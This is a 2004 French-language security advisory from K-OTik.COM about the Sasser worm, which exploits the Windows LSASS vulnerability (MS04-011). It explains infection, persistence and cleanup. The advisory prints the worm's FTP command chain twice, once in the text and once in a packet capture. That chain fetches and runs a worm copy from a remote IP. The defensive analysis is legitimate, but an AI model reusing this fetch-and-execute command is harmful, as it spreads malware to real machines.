Le ver Sasser exploite la vulnérabilité Windows LSASS (MS04-011)


Par K-OTik.COM © (Cellule Veille) - Nous l'attendions depuis plusieurs jours, le voici : Sasser.Worm est le premier ver exploitant les dernières vulnérabilités Microsoft Windows LSASS (bulletin MS04-011). Développé en Visual C++, il se propage rapidement en s'introduisant sur des machines Windows 2000 ou XP non patchées et donc vulnérables à la faille LSASS (Local Security Authority Subsystem Service) dont le correctif a été publié le 13 Avril 2004.

 

Aliases : W32.Sasser.Worm / B / C / D / E       Taille : 15,872 Octets
             W32/Sasser-A / B / C / D / E
             W32/Sasser.A / B / C / D / E
             W32/Sasser.worm / B / C / D / E
             Win32.Sasser.A / B / C / D / E
             WORM_SASSER.A / B / C / D / E


 
Sasser Worm
 Risque Elevé (3/4)

 


Le crash et le reboot d'une machine Windows (crash de lsass.exe) est une preuve d'infection.



Sasser infecte les systèmes Windows via le port TCP 445, il s'installe dans le répertoire Windows sous le nom de fichier "AVSERVE.EXE" ou "AVSERVE2.EXE", puis rajoute l'entrée suivante au registre :

[SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"avserve.exe" = "%WinDir%\avserve.exe"
(avserve2.exe pour Sasser.B
skynetave.exe pour Sasser.C
lsasss.exe pour Sasser.E)

Afin de se propager, Sasser balaye des adresses IP aléatoires, et lorsqu'un système vulnérable est identifié, le ver envoie un paquet spécifique vers le port 445. Une fois le débordement exploité, un shell est ouvert sur le port 9996/TCP, il permettra l'exécution de commandes arbitraires distantes. Un deuxième port (5554/TCP) est ouvert sur les machines infectées, il sera utilisé comme mini-serveur ftp, afin de communiquer avec d'autres systèmes infectés.

Sasser crée ensuite le script CMD.FTP contenant un certain nombre d'instructions dont le but est de récupérer (via ftp) puis exécuter une copie du ver, cette copie sera placée dans le répertoire System de Windows, sous un nom aléatoire _up.exe

"echo off&echo open [IP] 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get [nombre aléatoire]_up.exe>>cmd.ftp&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&[nombre aléatoire]i_up.exe&echo off&del cmd.ftp&echo on"

Une fois le fichier CMD.FTP supprimé, un fichier log est crée (WIN.LOG ou WIN2.LOG) dans le répertoire racine. Ce fichier contient le nombre de systèmes distants que le système local a pu infecter ainsi que l'IP de la dernière machine contaminée.

 Nous conseillons l'application immédiate du patch MS04-011, et le blocage du port 445.
 En cas d'infection, il faut tuer les processus "avserve.exe", "lsasss.exe", "
skynetave.exe" via
 le Gestionnaire des taches puis supprimer la clé  HKLM\Software\Microsoft\Windows\Current
 Version\Run\avserve.exe du registre. Enfin, il faut supprimer les différentes copies du virus.

» Outil de Désinfection (Symantec) - FxSasser
» Outil de Désinfection (Mcafee) - Stinger
» Outil de Désinfection (F-Secure) - F-sasser
» Appliquer le correctif de sécurité Microsoft Windows - MS04-011

Changelog :
01 Mai 2004 : Version Initiale
02 Mai 2004 : Sasser.B (Risque Elevé 3/4 - Propagation rapide)
03 Mai 2004 : Sasser.C
03 Mai 2004 : Sasser.D (SKYNETAVE.EXE)
05 Mai 2004 : Sasser s'essouffle, nous avons donc baissé le niveau d'alerte à "Moyen".
08 Mai 2004 : Arrestation en Allemagne de l'auteur présumé de Sasser.
10 Mai 2004 : Sasser.E (LSASSS.EXE)

© K-OTik.COM (Cellule Veille)    

---------------------------------------------------------------------------------------------------------------------
Capture Sasser (Merci au SANS Institue)
-----------------------------------------------------------------------------------------------------------------
----
05/01-12:05:28.458194 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119 TOS:0x0 ID:49167 IpLen:20 DgmLen:48 DF ******S* Seq: 0x605F104A Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK
-----------------------------------------------------------------------------------------------------------------
----
05/01-12:05:28.498249 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119 TOS:0x0 ID:49168 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x605F104B Ack: 0xE15F8D72 Win: 0xFAF0 TcpLen: 20
-----------------------------------------------------------------------------------------------------------------
----
05/01-12:05:28.503069 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119 TOS:0x0 ID:49169 IpLen:20 DgmLen:41 DF ***AP*** Seq: 0x605F104B Ack: 0xE15F8D72 Win: 0xFAF0 TcpLen: 20 65 e
-----------------------------------------------------------------------------------------------------------------
----
05/01-12:05:28.644086 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119 TOS:0x0 ID:49174 IpLen:20 DgmLen:252 DF ***AP*** Seq: 0x605F104C Ack: 0xE15F8D72 Win: 0xFAF0 TcpLen: 20 63 68 6F 20 6F 66 66 26 65 63 68 6F 20 6F 70 65 cho off&echo ope 6E 20 32 34 2E 39 37 2E 32 31 39 2E 31 38 35 20 n 24.97.219.185 35 35 35 34 3E 3E 63 6D 64 2E 66 74 70 26 65 63 5554>>cmd.ftp&ec 68 6F 20 61 6E 6F 6E 79 6D 6F 75 73 3E 3E 63 6D ho anonymous>>cm 64 2E 66 74 70 26 65 63 68 6F 20 75 73 65 72 26 d.ftp&echo user& 65 63 68 6F 20 62 69 6E 3E 3E 63 6D 64 2E 66 74 echo bin>>cmd.ft 70 26 65 63 68 6F 20 67 65 74 20 33 31 39 31 37 p&echo get 31917 5F 75 70 2E 65 78 65 3E 3E 63 6D 64 2E 66 74 70 _up.exe>>cmd.ftp 26 65 63 68 6F 20 62 79 65 3E 3E 63 6D 64 2E 66 &echo bye>>cmd.f 74 70 26 65 63 68 6F 20 6F 6E 26 66 74 70 20 2D tp&echo on&ftp - 73 3A 63 6D 64 2E 66 74 70 26 33 31 39 31 37 5F s:cmd.ftp&31917_ 75 70 2E 65 78 65 26 65 63 68 6F 20 6F 66 66 26 up.exe&echo off& 64 65 6C 20 63 6D 64 2E 66 74 70 26 65 63 68 6F del cmd.ftp&echo 20 6F 6E 0A on.
-----------------------------------------------------------------------------------------------------------------
----
05/01-12:05:29.490393 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119 TOS:0x0 ID:49184 IpLen:20 DgmLen:40 DF ***A***F Seq: 0x605F1120 Ack: 0xE15F8D72 Win: 0xFAF0 TcpLen: 20
-----------------------------------------------------------------------------------------------------------------
----

  

 F-VNS Security Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits